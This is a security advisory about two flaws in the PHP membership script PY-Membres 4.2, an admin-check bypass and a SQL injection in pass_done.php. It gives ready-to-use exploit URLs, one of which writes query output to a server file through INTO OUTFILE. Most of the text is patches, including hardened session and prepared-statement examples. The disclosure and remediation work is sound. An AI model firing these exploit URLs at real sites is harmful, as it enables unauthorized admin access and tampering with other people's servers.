Date: Tue, 26 Aug 2003 17:03:33 +0200
From: "Frog Man" <leseulfrog@...mail.com>
To: bugtraq@...urityfocus.com, vulnwatch@...nwatch.org
Subject: [PHP] PY-Membres 4.2 : Admin Access, SQL Injection


Information:
°°°°°°°°°°°°°
Language: PHP
Version: 4.0, 4.1, 4.2 (and earlier?)
Website: http://www.scripts-php.com
Problems:
- Admin Access
- SQL Injection

PHP Code/Location:
°°°°°°°°°°°°°°°°°°°
admin/secure.php:

----------------------------------------------
<?
// With register_globals on, a request parameter named adminpy defines $adminpy,
// so !isset($adminpy) is false and the && makes the whole test false: no redirect.
if (!isset($adminpy) && $adminpy !== "$admin")
{
Header("Location: index.php");
exit;
}
?>
----------------------------------------------

pass_done.php:

-----------------------------------------------------------------------------------------------------------------------------
[...]
if($Submit)
{
connexiondb();
// $email arrives straight from the request (register_globals) and is placed
// unescaped inside the quoted string literal of the query.
$query = mysql_query("SELECT login, passwd FROM $db_table WHERE email='$email'");
list($login, $passwd) = mysql_fetch_row($query);
$nb=mysql_num_rows($query);
if($nb<1)
{ echo"<script language=\"Javascript\">alert('Aucun membre ne correspond à votre e-mail !');window.location='pass_done.php';</script>";
exit;}
[...]
-----------------------------------------------------------------------------------------------------------------------------


Exploits:
°°°°°°°°

http://[target]/admin/admin.php?adminpy=1

http://[target]/pass_done.php?Submit=1&email='%20OR%203%20IN%20(1,2,3)%20INTO%20OUTFILE%20'/complete/path/file.txt


Patch:
°°°°°°°
A patch and more details can be found at http://www.phpsecure.info.

In admin/secure.php, just replace the line:
----------------------------------------------
if (!isset($adminpy) && $adminpy !== "$admin")
----------------------------------------------
with:
----------------------------------------------
if (!isset($adminpy) || $adminpy !== "$admin")
----------------------------------------------
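The `||` patch above is the minimal fix: the intended rule is "deny unless the flag is present AND equals `$admin`", and the negation of that is "not set OR not equal", which is exactly what the corrected line tests. The following is an added example, not PY-Membres code or the author's patch, showing how the same gate looks when the flag is read only from the server-side session instead of from a register_globals variable. The secret value used in `demo()` is constructed; in a real deployment `$admin` would come from the application's config include, as in the original file.

```php
<?php
// Added example (not PY-Membres code): a hardened replacement for admin/secure.php.
declare(strict_types=1);

/**
 * Decide whether the current visitor may see the admin pages.
 *
 * The original check was
 *     if (!isset($adminpy) && $adminpy !== "$admin")
 * With register_globals enabled a request carrying ?adminpy=1 defines
 * $adminpy, so !isset() is false and the "&&" makes the whole condition
 * false: the redirect never fires.  The intended rule is "deny unless the
 * flag is present AND equals $admin"; its negation is "not set OR not
 * equal", which is the advisory's "||" patch.
 *
 * Here the flag is read only from the session array (never from the
 * request), and the comparison is constant-time.
 */
function adminAuthorized(array $session, string $admin): bool
{
    if (!isset($session['adminpy']) || !is_string($session['adminpy'])) {
        return false;                                    // missing flag: deny
    }
    return hash_equals($admin, $session['adminpy']);     // wrong flag: deny
}

/** Constructed cases showing the three outcomes of the gate. */
function demo(): array
{
    $admin = 'constructed-admin-secret';   // stands in for the configured $admin
    return [
        // no session flag; whatever the request carries is never consulted
        'anonymous' => adminAuthorized([], $admin),                   // false
        // flag present but not equal to the secret
        'wrong'     => adminAuthorized(['adminpy' => '1'], $admin),   // false
        // flag stored by the login handler after a successful password check
        'admin'     => adminAuthorized(['adminpy' => $admin], $admin), // true
    ];
}

// Drop-in use at the top of admin/secure.php (skipped when run from the CLI).
if (PHP_SAPI !== 'cli') {
    session_start();
    $admin = $admin ?? '';   // assumed to come from the application's config include
    if (!adminAuthorized($_SESSION, (string) $admin)) {
        header('Location: index.php');
        exit;
    }
} else {
    var_dump(demo());
}
```

The login handler, not shown here, is what writes `$_SESSION['adminpy']` after verifying the password; nothing in the request can set it, so the `?adminpy=1` bypass has no variable left to define.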


And in pass_done.php, add the line:
----------------------------
$email = addslashes($email);
----------------------------

just before:

---------------------------------------------------------------------------------
$query = mysql_query("SELECT login, passwd FROM $db_table WHERE email='$email'");
---------------------------------------------------------------------------------
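`addslashes()` stops the quote in the advisory's payload from closing the `'$email'` literal, but it is an escaping fix layered on string concatenation. The added example below (not PY-Membres code or the author's patch) does the same lookup with a PDO prepared statement, so the e-mail value is sent as data and never becomes part of the SQL text. The in-memory SQLite database, the `membres` table and the single row in `demo()` are constructed stand-ins for the application's MySQL table; `$db_table` is assumed to come from configuration, as in the original, and is validated as an identifier because table names cannot be bound as parameters.

```php
<?php
// Added example (not PY-Membres code): the pass_done.php lookup with a bound parameter.
declare(strict_types=1);

/**
 * Look up the member record for an e-mail address.
 * Returns ['login' => ..., 'passwd' => ...] or null when no member matches.
 */
function lookupMemberByEmail(PDO $pdo, string $dbTable, string $email): ?array
{
    // Identifiers cannot be parameters; accept only a strict shape so a bad
    // configuration value fails closed instead of being interpolated blindly.
    if (!preg_match('/^[A-Za-z0-9_]+$/', $dbTable)) {
        throw new InvalidArgumentException('invalid table name');
    }
    // The e-mail is bound, not concatenated: quotes inside it stay inside the value.
    $stmt = $pdo->prepare("SELECT login, passwd FROM $dbTable WHERE email = :email");
    $stmt->execute([':email' => $email]);
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    return $row === false ? null : $row;
}

/** Constructed data: an in-memory SQLite table standing in for the MySQL one. */
function demo(): array
{
    $pdo = new PDO('sqlite::memory:', null, null, [PDO::ATTR_ERRMODE => PDO::ERRMODE_EXCEPTION]);
    $pdo->exec('CREATE TABLE membres (login TEXT, passwd TEXT, email TEXT)');
    $pdo->exec("INSERT INTO membres VALUES ('alice', 'constructed-pw', 'alice@example.org')");

    // Normal request: the matching row comes back.
    $legit = lookupMemberByEmail($pdo, 'membres', 'alice@example.org');

    // The advisory's payload, URL-decoded.  Bound as a plain value it matches no
    // row, and the INTO OUTFILE clause is never parsed as SQL.
    $payload = "' OR 3 IN (1,2,3) INTO OUTFILE '/complete/path/file.txt";
    $inject = lookupMemberByEmail($pdo, 'membres', $payload);

    return ['legit' => $legit, 'inject' => $inject];   // inject => null
}

// Request handling as it would sit in pass_done.php (skipped when run from the CLI).
// The original tested the globals $Submit and $email; here they are read explicitly.
if (PHP_SAPI !== 'cli') {
    // $pdo and $db_table are assumed to be provided by the application's DB include.
    if (isset($_POST['Submit'])) {
        $member = lookupMemberByEmail($pdo, (string) $db_table, (string) ($_POST['email'] ?? ''));
        if ($member === null) {
            header('Location: pass_done.php');   // same outcome as the original's alert+redirect
            exit;
        }
        // continue with the original reminder logic using $member['login']
    }
} else {
    var_dump(demo());
}
```

With the `mysql_*` extension the page uses there is no parameter binding, which is why the advisory reaches for `addslashes()`; `mysql_real_escape_string()` would at least respect the connection character set, but binding the value removes the escaping question entirely.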





frog-m@n



